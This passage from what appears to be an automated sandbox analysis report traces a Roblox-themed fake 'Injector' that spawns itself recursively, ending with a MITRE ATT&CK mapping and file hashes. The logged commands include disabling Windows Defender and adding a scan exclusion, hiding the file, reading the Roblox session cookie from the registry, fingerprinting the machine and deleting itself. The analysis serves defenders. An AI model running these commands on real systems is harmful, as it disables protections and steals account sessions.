        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        40⤵
        
        PID:3764
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        40⤵
        Detects videocard installed
        
        PID:4620
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Injector.exe" && pause
        40⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:1828
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        41⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:456
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        39⤵
        
        PID:4336
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        39⤵
        Checks computer location settings
        
        PID:4484
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        40⤵
        
        PID:3776
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        40⤵
        
        PID:5004
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        40⤵
        Checks computer location settings
        
        PID:416
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        41⤵
        
        PID:4436
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        41⤵
        
        PID:2344
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        41⤵
        Checks computer location settings
        
        PID:3980
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        42⤵
        Drops file in Drivers directory
        
        PID:4004
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        43⤵
        
        PID:2508
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        43⤵
        Views/modifies file attributes
        
        PID:3536
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Injector.exe'
        43⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1300
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        43⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2292
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        43⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2308
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        43⤵
        
        PID:5004
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        43⤵
        
        PID:3100
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        43⤵
        
        PID:4084
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        43⤵
        
        PID:2856
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        43⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:384
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        43⤵
        Detects videocard installed
        
        PID:4244
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Injector.exe" && pause
        43⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:2820
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        44⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4948
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        42⤵
        
        PID:816
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        42⤵
        Checks computer location settings
        
        PID:1876
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        43⤵
        
        PID:2216
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        43⤵
        
        PID:4436
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        43⤵
        Checks computer location settings
        
        PID:4384
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        44⤵
        
        PID:5032
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        44⤵
        
        PID:4636
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        44⤵
        Checks computer location settings
        
        PID:2912
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        45⤵
        
        PID:2880
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        45⤵
        
        PID:2664
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        45⤵
        Checks computer location settings
        
        PID:1524
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        46⤵
        Drops file in Drivers directory
        
        PID:2372
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        47⤵
        
        PID:3752
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        47⤵
        Views/modifies file attributes
        
        PID:1036
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Injector.exe'
        47⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2096
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        47⤵
        
        PID:4376
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        47⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1204
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        47⤵
        
        PID:1472
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        47⤵
        
        PID:2840
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        47⤵
        
        PID:4552
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        47⤵
        
        PID:2208
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        47⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2988
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        47⤵
        Detects videocard installed
        
        PID:3920
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Injector.exe" && pause
        47⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:388
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        48⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1640
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        46⤵
        
        PID:776
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        46⤵
        Checks computer location settings
        
        PID:3264
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        47⤵
        
        PID:2200
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        47⤵
        
        PID:2452
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        47⤵
        Checks computer location settings
        
        PID:3944
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        48⤵
        
        PID:4900
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        48⤵
        
        PID:3344
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        48⤵
        Checks computer location settings
        
        PID:1844
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        49⤵
        
        PID:4372
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        49⤵
        
        PID:1460
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        49⤵
        Checks computer location settings
        
        PID:3236
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        50⤵
        Drops file in Drivers directory
        
        PID:5088
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        51⤵
        
        PID:4436
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        51⤵
        Views/modifies file attributes
        
        PID:696
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Injector.exe'
        51⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4892
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        51⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3904
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        51⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4940
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        51⤵
        
        PID:1088
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        51⤵
        
        PID:4396
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        51⤵
        
        PID:4116
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        51⤵
        
        PID:3456
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        51⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4472
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        51⤵
        Detects videocard installed
        
        PID:4312
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Injector.exe" && pause
        51⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:1596
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        52⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2332
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        50⤵
        
        PID:2792
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        50⤵
        Checks computer location settings
        
        PID:3224
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        51⤵
        
        PID:3568
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        51⤵
        
        PID:3364
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        51⤵
        Checks computer location settings
        
        PID:4952
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        52⤵
        
        PID:5000
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        52⤵
        
        PID:5112
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        52⤵
        Checks computer location settings
        
        PID:3924
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        53⤵
        Drops file in Drivers directory
        
        PID:2828
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        54⤵
        
        PID:3512
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        54⤵
        Views/modifies file attributes
        
        PID:320
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Injector.exe'
        54⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:836
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        54⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4036
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        54⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4260
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        54⤵
        
        PID:416
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        54⤵
        
        PID:4148
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        54⤵
        
        PID:4240
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        54⤵
        
        PID:3844
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        54⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1184
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        54⤵
        Detects videocard installed
        
        PID:4952
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Injector.exe" && pause
        54⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:4476
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        55⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1072
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        53⤵
        
        PID:3944
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        53⤵
        Checks computer location settings
        
        PID:3684
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        54⤵
        
        PID:4092
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        54⤵
        
        PID:4136
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        54⤵
        Checks computer location settings
        
        PID:3920
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        55⤵
        
        PID:3696
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        55⤵
        
        PID:4548
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        55⤵
        Checks computer location settings
        
        PID:4000
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        56⤵
        Drops file in Drivers directory
        
        PID:3320
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        57⤵
        
        PID:2348
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        57⤵
        Views/modifies file attributes
        
        PID:188
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Injector.exe'
        57⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3904
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        57⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4652
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        57⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1036
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        57⤵
        
        PID:4240
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        57⤵
        
        PID:2284
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        57⤵
        
        PID:2244
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        57⤵
        
        PID:4428
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        57⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3924
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        57⤵
        Detects videocard installed
        
        PID:4092
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Injector.exe" && pause
        57⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:4064
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        58⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4160
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        56⤵
        
        PID:648
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        56⤵
        Checks computer location settings
        
        PID:1676
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        57⤵
        
        PID:3804
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        57⤵
        
        PID:5100
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        57⤵
        Checks computer location settings
        
        PID:3536
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        58⤵
        
        PID:2892
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        58⤵
        
        PID:216
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        58⤵
        
        PID:4312
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        59⤵
        
        PID:2128
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        59⤵
        
        PID:836
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        59⤵
        
        PID:548
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        60⤵
        
        PID:4136
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        61⤵
        
        PID:4604
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        61⤵
        Views/modifies file attributes
        
        PID:844
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Injector.exe'
        61⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4000
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        61⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5060
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        61⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:228
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        61⤵
        
        PID:2244
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        62⤵
        
        PID:3924
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        60⤵
        
        PID:1972
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        60⤵
        
        PID:5004
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        61⤵
        
        PID:2452
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        61⤵
        
        PID:1844
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        61⤵
        
        PID:4320

C:\Windows\explorer.exe
explorer.exe
1⤵
PID:4696

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Safe Mode Boot

T1562.009

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\BootstrapperV1.23.exe.log

Filesize
654B

MD5
11c6e74f0561678d2cf7fc075a6cc00c

SHA1
535ee79ba978554abcb98c566235805e7ea18490

SHA256
d39a78fabca39532fcb85ce908781a75132e1bd01cc50a3b290dd87127837d63

SHA512
